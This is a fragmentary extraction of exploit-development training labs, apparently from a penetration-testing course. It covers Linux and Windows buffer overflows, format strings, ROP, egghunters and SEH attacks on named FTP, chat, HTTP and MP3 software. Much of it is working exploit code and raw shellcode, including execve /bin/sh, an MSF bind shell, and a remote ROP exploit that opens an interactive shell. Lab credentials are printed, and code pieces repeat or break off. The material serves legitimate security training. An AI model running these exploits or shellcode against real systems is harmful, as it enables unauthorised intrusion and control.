Professional Documents
Culture Documents
Scenario
You are performing a penetration test against the eLS
organization. After phishing a system administrator,
you end up with SSH credentials related to the
172.16.172.101 machine. Your red team manager
suggested that you first try to escalate your
privileges on the aforementioned machine through
binary exploitation. Doing so will help you remain
under the radar, since other techniques, like kernel
exploits, are a lot noisier.
● Username: student
● Password: elsstudent
Goals
● Discover a buffer overflow vulnerability in a
binary
Recommended tools
● Gdb / gdb-peda
● Text editor
Tasks
Task 1: Connect to the compromised machine
and identify interesting binaries
Using bash or any other scripting language, you might
want to examine the file system in order to quickly
locate interesting binaries. Be reminded that
vulnerable SUID binaries can result in privilege
escalation.
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
And then, inside gdb, let's provide the new input file
to the binary.
As you can see, we can control the EIP via the buffer
overflow vulnerability.
info functions
There are 4 functions that look like custom ones. They
don't have .plt entries. Also, their names are
non-standard.
● runcommand
● readUserData and
● main
disas main
If you type just "cat" into a bash shell, you will see
that cat is awaiting input. The stdin is held open.
Scenario
You are performing yet another penetration test
against the eLS organization. After accessing an
unprotected SMB share, you end up with SSH credentials
related to the 172.16.172.62 machine. Your red team
manager once again suggested that you first try to
escalate your privileges on the aforementioned machine
through binary exploitation. Doing so will help you
remain under the radar, since other techniques, like
kernel exploits, are a lot noisier.
● Username: xdev
● Password: xdev
Goals
● Discover a buffer overflow vulnerability in a
binary
Recommended tools
● Gdb / gdb-peda
● Text editor
● Kali linux
ssh xdev@172.16.172.101
password: xdev
Tasks
Task 1: Connect to the compromised machine
and identify interesting binaries
Using bash or any other scripting language, you might
want to examine the file system in order to quickly
locate interesting binaries. Be reminded that
vulnerable SUID binaries can result in privilege
escalation. The ltrace tool may help you perform an
initial investigation of any interesting binaries.
Notes:
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
If you look at the man page for strcpy, you will come
across the below.
man strcpy
Strcpy() is a known vulnerable function that is often
the root cause of buffer overflows. In this case, the
segfault is caused by copying from source "0", as
there is no such address. If you take a look at
strcpy's second parameter in the ltrace output, you
will notice it is 0.
payload = "\xcc"*390
payload += "\xc0\xf2\xff\xbf" #EIP = 0xbffff2c0
print payload
Let's provide the latest payload to the binary within
gdb, as follows.
sc = "\xcc" #INT3
payload = "\x90"*50
payload += sc
payload += "A"*(390-50-len(sc))
payload += "\xc0\xf2\xff\xbf" #EIP = 0xbffff2c0
print payload
sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\
x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
payload = "\x90"*50
payload += sc
payload += "A"*(390-50-len(sc))
payload += "\xc0\xf2\xff\xbf" #EIP = 0xbffff2c0
print payload
ulimit -c unlimited
Scenario
Exploit the remotely-listening binary at
172.16.172.41:4444. This is the socat fork of the local
binary "pwn3", served remotely using the below
command.
socat TCP-LISTEN:4444,reuseaddr,fork
EXEC:/home/xdev/pwn3
Goals
● Discover the buffer overflow vulnerability in the
binary
Recommended tools
● Gdb / gdb plugins (e.g. peda, gef)
● Text editor
● Python pwntools
ssh xdev@172.16.172.41
password: xdev
Tasks
Task 1: Connect to the lab and examine the
binary
Try to access the service at 172.16.172.41:4444.
Compare it with the "pwn3" binary available on xdev's
Desktop. Try to find the buffer overflow vulnerability
and control the EIP.
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
set disable-randomization on
payload = ""
payload += "A"*140 #junk buffer
payload += p32(puts_plt) #EIP overwrite
payload += p32(main) #return address
payload += p32(puts_got) #argument to puts()
payload = ""
payload += "A"*140 #junk buffer
payload += p32(puts_plt) #EIP overwrite
payload += p32(main) #return address
payload += p32(puts_got) #argument to puts()
payload = ""
payload = "A"*132
payload += p32(system)
payload += p32(exit)
payload += p32(binsh)
Scenario
Your red team manager, asked you to get familiar with
Linux egghunter shellcodes. An egghunter shellcode can
prove extremely helpful in case of an overflow where
the available buffer size is too small to accomodate
traditional shellcode payloads.
Goals
● Understand how the access(2) egghunter variant can
be built in Assembly
Recommended tools
● nasm
● gcc
● objdump
● netcat
Username: xdev
Password: xdev
Tasks
Task 1: Learn about memory pages on 32-bit
Linux systems and the access system call
In order to search within a 32-bit Linux system's
memory, you first need to understand how the memory
pages are laid out. Refer to the following source to
learn more about this subject.
https://manybutfinite.com/post/how-the-kernel-manages-
your-memory/ As far as the access syscall is
concerned, we can learn more about it by issuing a man
2 access command.
\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x
0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74
\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2
MSF's bind_tcp shellcode (port 1234) is:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x
cd\x80\x5b\x5e\x52\x68\x02\x00\x04\xd2\x6a\x10\x51\x50
\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x
66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd
\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x
6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
global _start
section .txt
_start:
global _start
section .txt
_start:
Let's now clear the ecx, eax and edx registers. This
can be done through the mul opcode. The mul opcode
will multiply its operand against the eax register and
store the result in eax and edx. In this occasion
multiplication will occur by 0 and as a result 0 will
be stored in both eax and edx.
page_alignment:
or dx, 0xfff ; this is the same as "add dx, 4095"
address_inspection:
inc edx
pushad
lea ebx, [edx +4]
mov al, 0x21
int 0x80
jmp edx
global _start
section .text
_start:
page_alignment:
or dx, 0xfff
address_inspection:
inc edx
pushad
lea ebx, [edx+4]
mov al, 0x21
int 0x80
jmp edx
cd Desktop/
nasm -f elf32 -o egghunter.o egghunter.nasm
#include <stdio.h>
#include <string.h>
int main(void)
{
printf("Egg hunter length: %d\n", strlen(hunter));
printf("Shellcode length: %d\n", strlen(bind));
return 0;
}
From inside our host (not the SSH terminal) let's see
if we can connect to the (supposedly) bound port 1234,
using netcat, as follows.
nc 172.16.172.151 1234
Scenario
Now that you are now familiar with basic stack
overflow exploitation, challenge yourself with
exploiting a stack overflow on a 64-bit operating
system (Ubuntu 16). The system is purposely
de-hardened for this scenario. If you don't get
confused by 64-bit addresses, you will have no issue
completing this lab!
You can connect to the lab machine via SSH. The target
IP is 172.16.172.122
● Username: xdev
● Password: xdev
Goals
● Discover a buffer overflow vulnerability in a
binary
Recommended tools
● Gdb / gdb-peda
● Text editor
● Kali linux
ssh xdev@172.16.172.122
password: xdev
Tasks
Task 1: Connect to the provided machine and
examine the target binary
The target binary is named basic. Examine the
executable. Identify how to feed it with input and if
the binary employs any exploit countermeasures. You
can use the checksec utility which is installed on the
machine. Also, remember to check the ASLR settings.
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
print payload
buf = ""
buf +=
"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf +=
"\xef\xff\xff\xff\x48\xbb\xfc\x4e\xe5\x0e\x7e\x6b\xa5"
buf +=
"\x19\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf +=
"\x96\x75\xbd\x97\x36\xd0\x8a\x7b\x95\x20\xca\x7d\x16"
buf +=
"\x6b\xf6\x51\x75\xa9\x8d\x23\x1d\x6b\xa5\x51\x75\xa8"
buf +=
"\xb7\xe6\x76\x6b\xa5\x19\xd3\x2c\x8c\x60\x51\x18\xcd"
buf += "\x19\xaa\x19\xad\x87\x98\x64\xa0\x19"
payload = "\x90"*40
payload += buf
payload += "A"*(128-len(buf))
payload += pack("<Q", 0x7fffffffe418)
print payload
Scenario
There is a vulnerable binary from pCTF 2011 named
hashcalc. The binary was placed on a Debian6 virtual
machine by your red team manager. Your task is to
create an exploit that attacks the hashcalc server
remotely and allows for command execution.
Hints:
Goals
● Create a remote exploit that takes advantage of
the vulnerable hashcalc server. You should achieve
remote command execution (root-level access is not
required).
Recommended tools
● Gdb
● Text editor
● Linus binutils
Username: xdev
Password: xdev
Tasks
Task 1: Recognize the exploitable conditions
Login to the remote Debian machine and inspect the
hashcalc binary. What does it do? Where does it store
its output? How do you communicate with it? Can you
spot the vulnerability? Are there any exploit
countermeasures in place?
SC =
"\x31\xc9\x31\xdb\xb3\x05\x6a\x3f\x58\xcd\x80\x41\x80\
xf9\x03\x75\xf5"
SC +=
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\
x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
print output
● Re-attach it
SC =
"\x31\xc9\x31\xdb\xb3\x05\x6a\x3f\x58\xcd\x80\x41\x80\
xf9\x03\x75\xf5"
SC +=
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\
x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
for i in range(0,len(SC),2):
output += pack("<I", sc_addr+i)
#We prepare the shellcode address to be written
low = sc_addr&0xFFFF
high = sc_addr>>16
output += "%"+str((low-len(output))&0xFFFF) +
"u%"+str(offset)+"$hn"
output += "%"+str((high-low)&0xFFFF) +
"u%"+str(offset+1)+"$hn"
print output
Scenario
In this lab you will continue to learn x64 Linux
exploitation. Both the Operating System (Ubuntu 16)
and the target binary are 64-bit. The stack is not
executable (NX is enabled). You will have to find a
way around it.
You can connect to the lab machine via SSH. The target
IP is 172.16.172.153
● Username: xdev
● Password: xdev
Goals
● Discover vulnerabilities in the binary
Recommended tools
● Gdb / gdb-peda
● ROPgadget
● Text editor
● Kali linux
● password: xdev
Tasks
Task 1: Connect to the compromised machine
and examine the target binary
The target binary is named bypass_nx and is available
in the xdev user's Desktop directory. As your first
task, try to identify vulnerabilities within the
binary.
Remember that:
Hints:
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
#!/usr/bin/env python
buf = ""
buf += "A"*104 # junk
buf += pack("<Q", 0x0000000000400693) # pop rdi; ret;
buf += pack("<Q", 0x4006e8) # pointer to "/bin/sh"
buf += pack("<Q", 0x7ffff7a52390) # address of
system()
f = open("payload.txt", "w")
f.write(buf)
Scenario
There is a vulnerable binary from pCTF 2011 named
hashcalc. The binary was placed on a Debian6 virtual
machine by your red team manager. Your task is to
create an exploit that attacks the hashcalc server
remotely and allows for command execution. It is not
necessary to obtain an interactive shell.
Goals
● Create a remote exploit that takes advantage of
the vulnerable hashcalc server. You should achieve
remote command execution, (root-level access is
not required). Spawning an interactive shell is
also not required. Feel free to do so though, if
you feel confident.
Recommended tools
● Gdb
● Text editor
● Linus binutils
Tasks
Task 1: Recognize the exploitable conditions
Login to the remote Debian machine and inspect the
hashcalc binary. What does it do? Where does it store
its output? How do you communicate with it? Can you
spot the vulnerability? Are there any exploit
countermeasures in place?
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
import socket
import time
from struct import pack, unpack
target_ip = "172.16.172.112"
target_port = 30001
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
print s.recv(8192)
got_strlen_addr = 0x0804a41c
s.send(buf)
s.close()
● Re-attach it
● Flags is 0.
target_ip = "172.16.172.112"
target_port = 30001
got_plt_start = 0x0804a3cc
got_plt_start_size = 0x94
got_strlen_addr = 0x0804a41c
plt_send_addr = 0x08048994
socket_fd = 5
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
print s.recv(8192)
got_strlen_addr = 0x0804a41c
s.send(buf)
got_table = s.recv(8192) # size should be 0x94
print got_table
print ".got.plt: %d" % len(got_table)
s.close()
````
![](https://assets.ine.com/cybersecurity-lab-images/72
0843b6-f8e7-48b3-af16-cce6711d5c95/image37.png)
![](https://assets.ine.com/cybersecurity-lab-images/72
0843b6-f8e7-48b3-af16-cce6711d5c95/image38.png)
![](https://assets.ine.com/cybersecurity-lab-images/72
0843b6-f8e7-48b3-af16-cce6711d5c95/image40.png)
![](https://assets.ine.com/cybersecurity-lab-images/72
0843b6-f8e7-48b3-af16-cce6711d5c95/image41.png)
We see that the second library listed is a symlink to
another. Let's examine that library, as follows.
![](https://assets.ine.com/cybersecurity-lab-images/72
0843b6-f8e7-48b3-af16-cce6711d5c95/image42.png)
libc_dup2_addr = unpack("<I",
got_table[setreuid_offset:setreuid_offset+4])[0] +
libc_setreuid_dup2_offset #Get addr of dup2 based on
the setreuid libc address
libc_execve_addr = unpack("<I",
got_table[fork_offset:fork_offset+4])[0] +
libc_fork_execve_offset #Get addr of execve based on
the fork libc address
```python
buf += pack("<I", plt_recv_addr) + "CCCC" + pack("<I",
sock_fd) + pack("<I", got_plt_section) + pack("<I",
got_plt_section_size) + pack("<I", 0)
x/4i 0x8048c1a
0x8048c1a: add esp,0xc
0x8048c1d: pop ebx
0x8048c1e: pop ebp
0x8048c1f: ret
import socket
import time
from struct import pack, unpack
target_ip = "172.16.172.112"
target_port = 30001
got_setreuid_addr = 0x0804a440
got_fork_addr = 0x0804a44c
got_plt_start = 0x0804a3cc
got_plt_start_size = 0x94
got_strlen_addr = 0x0804a41c
socket_fd = 5
plt_recv_addr = 0x08048844
plt_send_addr = 0x08048994
plt_setreuid_addr = 0x08048984
plt_fork_addr = 0x080489b4
libc_dup2_addr = unpack("<I",
got_table[setreuid_offset:setreuid_offset+4])[0] +
libc_setreuid_dup2_offset #Get addr of dup2 based on
the setreuid libc address
libc_execve_addr = unpack("<I",
got_table[fork_offset:fork_offset+4])[0] +
libc_fork_execve_offset #Get addr of execve based on
the fork libc address
s.send(new_got_table)
s.close()
Task 6: Finish the ROP chain and execute a
remote command.
As a result of replacing the GOT of the remote
process, we can now assume the following.
plt_dup2_addr = plt_setreuid_addr
plt_execve_addr = plt_fork_addr
while True:
c = raw_input("$ ")
send_cmd(s, c)
import socket
import time
from struct import pack, unpack
#now the shell is spawned, the socket interacts with
the backend bash
def send_cmd(s, cmd):
s.send(cmd+"\n")
msg = s.recv(8192)
print msg
target_ip = "172.16.172.112"
target_port = 30001
got_setreuid_addr = 0x0804a440
got_fork_addr = 0x0804a44c
got_plt_start = 0x0804a3cc
got_plt_start_size = 0x94
got_strlen_addr = 0x0804a41c
socket_fd = 5
plt_recv_addr = 0x08048844
plt_send_addr = 0x08048994
plt_setreuid_addr = 0x08048984
plt_fork_addr = 0x080489b4
got_strlen_addr = 0x0804a41c
#0x8049106: add esp 0x54 ; pop ebx ; pop esi ; pop ebp
; ret;
buf_fmt = pack("<I", got_strlen_addr) + pack("<I",
got_strlen_addr+2) + "%"+str(0x804-8)+"x%6$hn" +
"%"+str(0x9106-0x804)+"x%5$hn"
buf = buf_fmt + "A"*(0x28-len(buf_fmt))
buf += pack("<I", plt_send_addr) + pack("<I",
0x8048c1a) + pack("<I", socket_fd) + pack("<I",
got_plt_start) + pack("<I", got_plt_start_size) +
pack("<I", 0) + "JUNK"
buf += pack("<I", plt_recv_addr) + pack("<I",
0x8048c1a) + pack("<I", socket_fd) + pack("<I",
got_plt_start) + pack("<I", got_plt_start_size) +
pack("<I", 0) + "JUNK"
plt_dup2_addr = plt_setreuid_addr
plt_execve_addr = plt_fork_addr
s.send(buf)
got_table = s.recv(8192) size should be 0x94
print got_table
print ".got.plt: %d" % len(got_table)
setreuid_offset = got_setreuid_addr - got_plt_start
fork_offset = got_fork_addr - got_plt_start
libc_dup2_addr = unpack("<I",
got_table[setreuid_offset:setreuid_offset+4])[0] +
libc_setreuid_dup2_offset
#Get addr of dup2 based on the setreuid libc address
libc_execve_addr = unpack("<I",
got_table[fork_offset:fork_offset+4])[0] +
libc_fork_execve_offset #Get addr of execve based on
the fork libc address
s.send(new_got_table)
while True:
c = raw_input("$ ")
send_cmd(s, c)
s.close()
Overcome ret2libc Limitations LAB
14
Scenario
Your red team manager has set up yet another
vulnerable machine (172.16.172.128) for you to
practice exploit development on. A vulnerable binary
can be found on the user's Desktop directory.
● ASLR is off
Goals
● Create a local exploit that works outside of gdb
and results in a shell
Recommended tools
● Gdb
● Text editor
● Linux binutils
Tasks
Task 1: Recognize the exploitable conditions
and find the offset to EIP
Inspect the vulnerable binary and locate an overflow
vulnerability. Your red team manager already told you
which exploit countermeasures are in place, but you
might want to confirm that. After that, try to
overwrite the EIP with an arbitrary value. Hint: Pay
attention to what instructions are executed right
before the crash.
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
● Libc is at 0xb7e09000
For the first gadget we will use the last one from
screenshot above.
p = lambda x : pack("I",x)
sc = shellcode
p = lambda x : pack("I",x)
libc = 0xb7e09000
permission = p(0xffffffff)
size = p(0x01010101) # a null-free size
ret = "YYYY" # addr of beginning of user buffer in gdb
stack = p(0xbffdf001) # gdb = 0xbffdf000+1 to avoid
null bytes
print payload
sc = shellcode
p = lambda x : pack("I",x)
libc = 0xb7e09000
permission = p(0xffffffff)
size = p(0x01010101)
ret = p(0xbffff4dc + offset)
stack = p(0xbffdf001)
payload = sc + (104-len(sc))*"\xcc"
payload += p(0xbffff548+4+offset)
print payload
Scenario
In this lab you will continue to learn x64 Linux
exploitation. Both the Operating System (Ubuntu 16)
and the target binary are 64-bit. Both are hardened as
well. You will need to bypass different exploit
countermeasures, so be prepared to use all the
knowledge gained so far.
You can connect to the lab machine via SSH. The target
IP is 172.16.172.126
● Username: xdev
● Password: xdev
Goals
● Discover vulnerabilities in the binary
Recommended tools
● Gdb / gdb-peda
● Text editor
● Kali linux
ssh xdev@172.16.172.126
password: xdev
Tasks
Task 1: Connect to the compromised machine
and examine the target binary
The target binary is named format and is available in
the xdev user's Desktop directory. As your first task,
examine what exploit countermeasures are in place and
try to identify vulnerabilities within the binary.
[https://github.com/david942j/one_gadget]
[https://github.com/m1ghtym0/magic_gadget_finder]
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
● It is 64-bit
Scenario
In this lab you will continue to learn x64 Linux
exploitation. Both the Operating System (Ubuntu 16)
and the target binary are 64-bit. The Ubuntu system
features ASLR. You will have to find a way around it.
You can connect to the lab machine via SSH. The target
IP is 172.16.172.152
Username: xdev
Password: xdev
Goals
● Discover vulnerabilities in the binary
● Utilize ROP
● Bypassing ASLR
Recommended tools
● Gdb / gdb-peda
● ROPgadget
● Text editor
● Kali linux
ssh xdev@172.16.172.152
password: xdev
Tasks
Task 1: Connect to the compromised machine
and examine the target binary
The target binary is named bypass_aslr and is
available in the xdev user's Desktop directory. As
your first task, try to identify vulnerabilities
within the binary.
Remember that:
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
Goals
● Fully exploit the vulnerable Freefloat FTP server
● Spawn calc.exe as a proof of concept
Recommended tools
● ImmunityDbg
● Mona.py
● Python
● Notepad++
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
badchars =
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d
\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x
1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\
x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3
a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\
x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5
b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\
x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7
a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\
x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9
a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\
xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xb
a\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\
xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xd
a\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\
xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xf
a\xfb\xfc\xfd\xfe\xff")
By embedding the above, the exploit will now become:
![](https://assets.ine.com/cybersecurity-lab-images/00
b82216-3e28-4325-82d4-b38ff89cbf94/image26.png)
![](https://assets.ine.com/cybersecurity-lab-images/00
b82216-3e28-4325-82d4-b38ff89cbf94/image28.png)
```python
import socket, os, sys
shellcode =
("\xbf\x52\x30\xc4\xb9\xd9\xc7\xd9\x74\x24\xf4\x5d\x31
\xc9\xb1"
"\x31\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x5d\xd2\x31\x45\
x89\x90"
"\xba\xb6\x49\xf5\x33\x53\x78\x35\x27\x17\x2a\x85\x23\
x75\xc6"
"\x6e\x61\x6e\x5d\x02\xae\x81\xd6\xa9\x88\xac\xe7\x82\
xe9\xaf"
"\x6b\xd9\x3d\x10\x52\x12\x30\x51\x93\x4f\xb9\x03\x4c\
x1b\x6c"
"\xb4\xf9\x51\xad\x3f\xb1\x74\xb5\xdc\x01\x76\x94\x72\
x1a\x21"
"\x36\x74\xcf\x59\x7f\x6e\x0c\x67\xc9\x05\xe6\x13\xc8\
xcf\x37"
"\xdb\x67\x2e\xf8\x2e\x79\x76\x3e\xd1\x0c\x8e\x3d\x6c\
x17\x55"
"\x3c\xaa\x92\x4e\xe6\x39\x04\xab\x17\xed\xd3\x38\x1b\
x5a\x97"
"\x67\x3f\x5d\x74\x1c\x3b\xd6\x7b\xf3\xca\xac\x5f\xd7\
x97\x77"
"\xc1\x4e\x7d\xd9\xfe\x91\xde\x86\x5a\xd9\xf2\xd3\xd6\
x80\x98"
"\x22\x64\xbf\xee\x25\x76\xc0\x5e\x4e\x47\x4b\x31\x09\
x58\x9e"
"\x76\xf5\xba\x0b\x82\x9e\x62\xde\x2f\xc3\x94\x34\x73\
xfa\x16"
"\xbd\x0b\xf9\x07\xb4\x0e\x45\x80\x24\x62\xd6\x65\x4b\
xd1\xd7"
"\xaf\x28\xb4\x4b\x33\x81\x53\xec\xd6\xdd")
buffer = "A"*247
buffer += "\xd3\xd9\xe2\x77" #EIP 0x77E2D9D3
buffer += "\x90"*30 #NOPs
buffer += shellcode #no more breakpoints or badchars,
now shellcode is here
buffer += "C"*(1000-len(buffer))
Scenario
You have been tasked by your red team manager, to
refresh your Windows exploit development skills.
Specifically, he provided you with a machine
(172.16.172.37) that features a vulnerable to SEH
overflow version of MP3 Studio. An exploit skeleton*
is also provided to you. Your task is to fully exploit
the SEH-based overflow vulnerability of MP3 Studio.
Recommended tools
● ImmunityDbg
● Mona.py
● Python
● Notepad++
Network Configuration &
Credentials
● Penetration tester's Subnet: 172.16.172.0/24
● Vulnerable machine: 172.16.172.37
● Connection Type: RDP
○ Username: elsadmin
○ Password: elsadmin1
Tasks
Task 1: Recognize the exploitable conditions
Confirm the vulnerability by attaching Immunity to MP3
Studio and crashing the application, utilizing the
exploit skeleton.
Solutions
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
badchars =
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d
\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x
1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\
x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3
a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\
x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5
b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\
x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7
a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\
x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9
a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\
xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xb
a\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\
xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xd
a\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\
xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xf
a\xfb\xfc\xfd\xfe\xff")
file = "exploit.mpf"
sc =
("\xb8\xb2\x9e\x3c\x9c\xda\xd3\xd9\x74\x24\xf4\x5b\x29
\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x43\x0f\x03\x43\xbd\x7c\xc9\x60\
x29\x02"
"\x32\x99\xa9\x63\xba\x7c\x98\xa3\xd8\xf5\x8a\x13\xaa\
x58\x26"
"\xdf\xfe\x48\xbd\xad\xd6\x7f\x76\x1b\x01\xb1\x87\x30\
x71\xd0"
"\x0b\x4b\xa6\x32\x32\x84\xbb\x33\x73\xf9\x36\x61\x2c\
x75\xe4"
"\x96\x59\xc3\x35\x1c\x11\xc5\x3d\xc1\xe1\xe4\x6c\x54\
x7a\xbf"
"\xae\x56\xaf\xcb\xe6\x40\xac\xf6\xb1\xfb\x06\x8c\x43\
x2a\x57"
"\x6d\xef\x13\x58\x9c\xf1\x54\x5e\x7f\x84\xac\x9d\x02\
x9f\x6a"
"\xdc\xd8\x2a\x69\x46\xaa\x8d\x55\x77\x7f\x4b\x1d\x7b\
x34\x1f"
"\x79\x9f\xcb\xcc\xf1\x9b\x40\xf3\xd5\x2a\x12\xd0\xf1\
x77\xc0"
"\x79\xa3\xdd\xa7\x86\xb3\xbe\x18\x23\xbf\x52\x4c\x5e\
xe2\x38"
"\x93\xec\x98\x0e\x93\xee\xa2\x3e\xfc\xdf\x29\xd1\x7b\
xe0\xfb"
"\x96\x74\xaa\xa6\xbe\x1c\x73\x33\x83\x40\x84\xe9\xc7\
x7c\x07"
"\x18\xb7\x7a\x17\x69\xb2\xc7\x9f\x81\xce\x58\x4a\xa6\
x7d\x58"
"\x5f\xc5\xe0\xca\x03\x24\x87\x6a\xa1\x38")
buffer = "A"*4112
buffer += "\xeb\x22\x90\x90" #jump more than 30 bytes
forward
buffer += "\xac\x9c\xec\x77" #0x77ec9cac : pop edx #
pop eax # ret
buffer += "\x90"*50 #NOPs
buffer += sc
Scenario
You have been tasked by your red team manager, to
refresh your Windows exploit development skills.
Specifically, he provided you with a machine
(172.16.172.38) that features a vulnerable to SEH
overflow version of the EasyChat server. An exploit
skeleton* is also provided to you. Your task is to
fully exploit the SEH-based overflow vulnerability of
the EasyChat server.
ip = "172.16.172.38"
port = 80
socket = socket.socket(socket.AF_INET ,
socket.SOCK_STREAM)
socket.connect((ip , port))
socket.send(request)
data = socket.recv(4096)
print data
socket.close()
Goals
● Fully exploit the vulnerable EasyChat server
Recommended tools
● ImmunityDbg
● Mona.py
● Python
● Notepad++
Network Configuration &
Credentials
● Penetration tester's Subnet: 172.16.172.0/24
Username: elsadmin
Password: elsadmin1
SOLUTIONS
Below, you can find solutions for each task. Remember
though that you can follow your own strategy (which
may be different from the one explained in the
following lab).
import os
import sys
import socket
ip = "127.0.0.1"
port = 80
socket = socket.socket(socket.AF_INET ,
socket.SOCK_STREAM)
socket.connect((ip , port))
socket.send(request)
data = socket.recv(4096)
print data
socket.close()
Scenario
You have been tasked by your red team manager, to
refresh your Windows exploit development skills.
Specifically, he provided you with a machine
(172.16.172.16) that features a vulnerable to overflow
version of the Kolibri HTTP server. An exploit
skeleton* is also provided to you. Your task this time
is to fully exploit the stack overflow vulnerability
of the Kolibri HTTP server, utilizing an egghunter
shellcode.
Goals
● Fully Exploit Kolibri HTTP server, using an
egghunter shellcode
Recommended tools
● ImmunityDbg
● Mona.py
● Python
● Notepad++
Username: elsadmin
Password: elsadmin1
Tasks
Task 1: Recognize the exploitable conditions
Confirm the vulnerability by attaching Immunity to the
Kolibri HTTP server and crashing the application,
utilizing the exploit skeleton.
Solutions
